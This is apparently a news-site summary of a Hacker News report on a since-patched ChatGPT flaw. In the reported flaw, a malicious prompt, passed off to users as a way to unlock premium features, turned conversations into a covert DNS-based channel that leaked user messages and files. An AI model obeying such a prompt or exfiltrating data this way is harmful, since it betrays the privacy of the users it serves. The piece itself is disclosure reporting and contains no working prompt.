
"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content."
"The vulnerability creates a security blind spot, with the AI system assuming that the environment was isolated."
"An attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free."
A vulnerability in OpenAI ChatGPT enabled the exfiltration of sensitive user data through a hidden DNS-based communication channel. This flaw allowed malicious prompts to turn ordinary conversations into covert data leaks, bypassing existing safeguards. OpenAI addressed the issue on February 20, 2026, with no evidence of exploitation found. The vulnerability created a security blind spot, as the AI system assumed isolation. Attackers could manipulate users into executing harmful prompts, especially within custom GPTs, amplifying the threat of data breaches.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]